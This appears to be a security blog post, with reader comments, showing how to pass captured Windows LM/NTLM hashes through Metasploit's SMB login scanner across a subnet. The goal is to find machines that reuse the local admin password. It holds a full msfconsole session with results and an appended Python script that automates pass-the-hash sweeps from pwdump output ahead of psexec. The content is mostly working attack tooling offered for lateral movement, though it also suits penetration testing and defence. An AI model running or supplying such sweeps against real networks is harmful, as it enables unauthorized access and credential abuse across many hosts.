owning a windows network

so… you were able to grab LM/NTLM hashes from a windows box? cool. no need to crack them first: scanner/smb/login will pass the hash as-is (set SMBPass to the LMHASH:NTLMHASH pair, 32 hex characters each half), so use it to sweep the rest of the range and see which systems accept the same hashes, i.e. where the local admin password has been reused:

msf exploit(psexec) > use scanner/smb/login
msf auxiliary(login) > info

Name: SMB Login Check Scanner
Version: 0
License: Metasploit Framework License (BSD)

Provided by:
tebo <tebo@attackresearch.com>

Basic options:
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
RHOSTS                      yes       The target address range or CIDR identifier
RPORT      445              yes       Set the SMB service port
SMBDomain  WORKGROUP        no        SMB Domain
SMBPass                     no        SMB Password
SMBUser    Administrator    no        SMB Username
THREADS    1                yes       The number of concurrent threads

Description:
This module will test a SMB login on a range of machines and report
successful logins. If you have loaded a database plugin and
connected to a database this module will record successful logins
and hosts so you can track your access.

msf auxiliary(login) > set RHOSTS 10.1.1.0/24
RHOSTS => 10.1.1.0/24
msf auxiliary(login) > set SMBPass XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (hash goes here)
SMBPass => XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
msf auxiliary(login) > exploit
[*] 10.1.1.6 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 10.1.1.21 - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.21
[*] 10.1.1.25 - SUCCESSFUL LOGIN (Windows 5.0)
[*] Recording successful SMB credentials for 10.1.1.25
[*] 10.1.1.29 - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.29
[*] 10.1.1.28 - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.28
[*] 10.1.1.31 - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 1)

To speed it up, set THREADS > 1. Be careful not to set it too high: with the default SQLite database the threads collide on the host/credential inserts, the insert fails, and you get errors like this one:

[*] Error: 10.1.1.189: ActiveRecord::StatementInvalid SQLite3::BusyException: database is locked: INSERT INTO "hosts" ("address", "name", "comm", "os_lang", "mac", "os_sp", "arch", "os_flavor", "address6", "os_name", "desc", "created", "state") VALUES('10.1.1.189', NULL, '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '2009-11-06 10:48:09', 'unknown')

Thanks to tebo for the excellent work. Now, if only it worked with credcollect.
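To make the sweep above repeatable, here is an added example (mine, not code from the original post or from Metasploit). It reads a pwdump-style dump (the `user:rid:LMHASH:NTHASH:::` format that hashdump/pwdump tools emit), turns each usable entry into the SMBUser/SMBPass pair that scanner/smb/login takes for pass-the-hash (the module accepts `LMHASH:NTHASH` in SMBPass), writes an msfconsole resource script that runs one scan per credential, and parses the scanner's output into the hosts that accepted the hash. The sample dump and sample scanner output in the block are constructed; the hash values are synthetic test values, not from any real box.

```python
"""Added example, not code from the original post or from Metasploit.

pwdump-style dump -> SMBUser/SMBPass settings -> msfconsole resource
script for scanner/smb/login -> list of hosts that accepted the hash.
Sample dump and sample scanner output below are constructed.
"""
import re

HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")
# LM half of an empty password: what you see when LM storage is disabled.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# Matches the two result line shapes the scanner prints, e.g.
# "[*] 10.1.1.21 - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)"
# "[*] 10.1.1.6 - FAILED 0xc000006d - STATUS_LOGON_FAILURE"
# (a dash or an en-dash is accepted, since copy/paste often turns one into the other)
RESULT = re.compile(
    r"^\[\*\]\s+(\d{1,3}(?:\.\d{1,3}){3})\s+[-\u2013]\s+"
    r"(SUCCESSFUL LOGIN|FAILED)(?:\s+\((.*?)\))?"
)


def parse_pwdump_line(line):
    """Return (user, 'lm:nt') for a well-formed pwdump line, else None.

    Placeholder entries such as Guest's 'NO PASSWORD****' are rejected:
    SMBPass has to be exactly two 32-hex-digit halves or the module
    treats the value as a plaintext password.
    """
    parts = line.strip().split(":")
    if len(parts) < 4:
        return None
    user, _rid, lm, nt = parts[:4]
    if not (HEX32.match(lm) and HEX32.match(nt)):
        return None
    return user, f"{lm.lower()}:{nt.lower()}"


def load_pwdump(text):
    """All usable (user, 'lm:nt') pairs from a dump, in file order."""
    creds = []
    for line in text.splitlines():
        parsed = parse_pwdump_line(line)
        if parsed:
            creds.append(parsed)
    return creds


def resource_script(rhosts, creds, threads=5):
    """Text of an msfconsole -r script: one scanner run per credential.

    THREADS stays modest on purpose; pushing it high with the default
    SQLite backend is what produces the 'database is locked' errors.
    """
    lines = [
        "use scanner/smb/login",
        f"set RHOSTS {rhosts}",
        f"set THREADS {threads}",
    ]
    for user, smbpass in creds:
        lines += [f"set SMBUser {user}", f"set SMBPass {smbpass}", "run"]
    return "\n".join(lines) + "\n"


def parse_results(output):
    """Map each host that accepted the hash to the OS string it reported."""
    hits = {}
    for line in output.splitlines():
        m = RESULT.match(line)
        if m and m.group(2) == "SUCCESSFUL LOGIN":
            hits[m.group(1)] = m.group(3) or ""
    return hits


# Constructed sample dump (synthetic hashes): Administrator with an LM/NT
# pair, a disabled Guest, and a service account whose LM half is empty.
SAMPLE_DUMP = """\
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

# Constructed scanner output in the shape shown in the post.
SAMPLE_OUTPUT = """\
[*] 10.1.1.6 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 10.1.1.21 - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.21
[*] 10.1.1.25 - SUCCESSFUL LOGIN (Windows 5.0)
[*] Recording successful SMB credentials for 10.1.1.25
"""

if __name__ == "__main__":
    creds = load_pwdump(SAMPLE_DUMP)
    print(resource_script("10.1.1.0/24", creds))
    for host, os_name in sorted(parse_results(SAMPLE_OUTPUT).items()):
        print(f"{host}\t{os_name}")
```

Save the generated script and run it with `msfconsole -r sweep.rc`; the parsed hit list is the set of boxes where that local account's password is reused, which is exactly the list you want before moving on to psexec.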

4 Comments

  1. hammackj says:

    Have you had any luck with the Metasploit SMB classes against Vista/2008/7? I have been having 100% failure against those with anything SMB, particularly a tool I am writing that uses the Rex SMB API.

  2. jcran says:

    @hammackj - yep, I've had good luck against 2008. What are you having trouble with?

  3. n1c0 says:

    having luck with windows 7
